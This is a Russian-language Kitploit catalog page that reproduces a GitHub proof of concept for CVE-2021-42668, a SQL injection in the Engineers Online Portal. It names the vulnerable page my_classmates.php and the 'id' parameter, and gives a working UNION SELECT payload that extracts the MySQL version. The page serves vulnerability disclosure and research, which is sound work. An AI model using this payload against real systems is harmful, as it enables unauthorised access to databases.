Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-42668 — Доказательство концепции эксплуатации для CVE-2021-42668, SQL-инъекции в Engineers Online Portal. Использует уязвимый параметр id в my_classmates.php для извлечения версии MySQL. | Kitploit
Инструменты/GitHubGitHub/0xdeku/cve-2021-42668
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеБезопасность Баз Данных
GitHub0xdeku/cve-2021-42668

CVE-2021-42668

Доказательство концепции эксплуатации для CVE-2021-42668, SQL-инъекции в Engineers Online Portal. Использует уязвимый параметр id в my_classmates.php для извлечения версии MySQL.

Репозиторий
134 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

cve-2021-42668

CVE-2021-42668 - уязвимость SQL-инъекции в системе онлайн-портала инженеров.

Техническое описание:

Уязвимость SQL-инъекции существует в онлайн-портале инженеров. Злоумышленник может использовать уязвимый параметр "id" на веб-странице "my_classmates.php" для манипуляции выполняемым SQL-запросом. В результате злоумышленник может извлечь конфиденциальные данные с веб-сервера.

Затронутые компоненты -

Уязвимая страница - my_classmates.php

Уязвимый параметр - "id"

Шаги для эксплуатации:

  1. Перейдите по адресу http://localhost/nia_munoz_monitoring_system/my_classmates.php
  2. Вставьте свою полезную нагрузку в параметр id

Подтверждение концепции (PoC) -

Следующая полезная нагрузка позволит вам извлечь версию сервера MySql, работающего на веб-сервере -

root@kitploit:~
' union select NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL;-- -

CVE-2021-42668

Ссылки -

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42668

https://nvd.nist.gov/vuln/detail/CVE-2021-42668

Обнаружено -

Алон Левиев (0xDeku), 22 октября 2021 года.

Скачать инструмент